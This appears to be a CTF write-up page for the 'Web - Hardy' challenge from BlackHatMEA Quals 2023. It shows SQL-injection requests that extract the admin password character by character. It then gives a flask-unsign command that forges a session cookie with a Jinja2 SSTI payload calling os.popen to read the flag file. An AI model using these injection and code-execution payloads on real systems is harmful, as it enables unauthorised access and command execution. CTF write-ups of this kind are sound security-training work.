Diefunction
  • About
  • Vulnerabilities
    • GHSL-2021-023 / CVE-2021-32819
  • BlachatMEA Finals 2024
  • CTF
    • Technology Control Company
      • Athackcon CTF 2021
        • Trust
        • Config
        • Extend
        • Poison
      • Blackhat MEA 2022
        • CTF Setup on Kali linux
        • Careers
        • SOC Complaints
    • Athackcon
      • POLL
    • Cyber Night 3
      • Client Hell
    • BlackHatMEA Quals 2022
      • Spatify
      • PeehPee
      • Meme generator
      • Black notes
      • Jimmy's blog
    • BlackHatMEA Quals 2023
      • Web - Hardy
      • Web - Authy
      • Reverse engineering - light up the server
    • BlackhatMEA Finals 2024
      • PWN
    • BITSCTF - Reverse Mishap
    • Cybernights 2025
      • REVERSE
      • PWN
    • BYUCTF 2025
      • PWN
Powered by GitBook
On this page
  • Solution
  • Dumping the admin password
  • The Flag

Was this helpful?

  1. CTF
  2. BlackHatMEA Quals 2023

Web - Hardy

No source code was provided

Solution

The parameter names are vulnerable to SQL Injection

Dumping the admin password

username=admin&SUBSTRING(password,1,1)=I
username=admin&SUBSTRING(password,1,2)=IL
username=admin&SUBSTRING(password,1,3)=ILI

ILIKEpotatoesSOMUCH::&& is the password for the admin

the password also is being used as a JWT secret and the application is vulnerable to SSTI {'type':'{{<payload>}}'}

The Flag

flask-unsign --sign \ 
--cookie "{'type': '{{cycler.__init__.__globals__.os.popen(\"cat /flag_086bf2851588e4e353fecee934635e09.txt\").read()}}'}" \
--secret "ILIKEpotatoesSOMUCH::&&"

PreviousBlackHatMEA Quals 2023NextWeb - Authy

Last updated 1 year ago

Was this helpful?